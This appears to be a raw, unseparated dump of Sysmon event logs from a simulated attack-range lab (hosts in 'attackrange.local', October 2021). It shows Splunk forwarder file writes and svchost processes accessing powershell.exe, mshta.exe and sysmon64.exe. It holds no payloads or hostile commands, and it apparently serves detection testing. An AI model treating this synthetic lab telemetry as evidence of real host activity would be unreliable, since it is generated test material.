AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081319Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03BBC9C1D94735E56BC1207CFF12077D,SHA256=04B2847209CDC58FBC868929F61091CAC753E5C886A57AB4A6D0A945C9FBF60D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081318Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:29.170{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50022-false10.0.1.12-8089- 23542300x8000000000000000103482Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.498{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EA9098C0882710A025C20117C8B0B19,SHA256=7579B75CD6CBB26BE77F8821AD5CBBC59CDF0D31DD106FF4B8C731AEE369D527,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081349Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:32.711{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9D8FC6F22B933492D8CE9C822BDED15,SHA256=149F73684244F6DA527F8D61DD9EB4FA7D6A603666A86CFE045439299E81F45E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081348Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:32.711{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99938CB44E88747CF224886B336C5C34,SHA256=9B755D62DF532B645C721BDEB6B403CE7197EC087433F915151499F277A9B679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081347Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:32.711{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0B91D1349A0D773BCAD0E870F357BC5,SHA256=E2434543F16E0746B89A15FFBC34C683671F57488A05A59D0879D850CE7DBB4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103481Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7F01-00000000FC01}6708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103480Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7D01-00000000FC01}6824C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103479Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7B01-00000000FC01}6420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103478Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7D01-00000000FC01}6824C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103477Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7F01-00000000FC01}6708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103476Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7B01-00000000FC01}6420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103475Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7A01-00000000FC01}7028C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103474Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7901-00000000FC01}4228C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103473Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7A01-00000000FC01}7028C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103472Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7901-00000000FC01}4228C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103471Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7801-00000000FC01}6240C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103470Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.388{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B0DF-615A-7801-00000000FC01}6240C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103469Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:32.029{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E16517D407C2BF99377479B4422BAEF3,SHA256=8732D534A4CEF855EE5E0FE23E4FCC779601A276424D171BB334FB21C6C3228B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081346Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:32.211{2FDD8D40-B247-615A-4301-00000000FD01}7843728C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103484Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:33.888{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103483Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:33.529{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09B96F00D135A8679A895228BCBA4006,SHA256=3098DAD7F6D3EE11CC67855FB444CFDE4DA31E6AEF85BA001F6EE1FF91DF17C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081363Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.758{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEEE956349526E53C8DC3F4297D67A39,SHA256=230D69DD97CD0C7FE28EDCFF1E6D04C196B53C1AC16F8AF2900A7A90B99F8F95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081362Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B249-615A-4401-00000000FD01}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081361Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081360Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081359Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081358Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081357Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081356Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081355Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081354Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081353Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081352Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B249-615A-4401-00000000FD01}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081351Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B249-615A-4401-00000000FD01}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081350Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:33.149{2FDD8D40-B249-615A-4401-00000000FD01}3060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 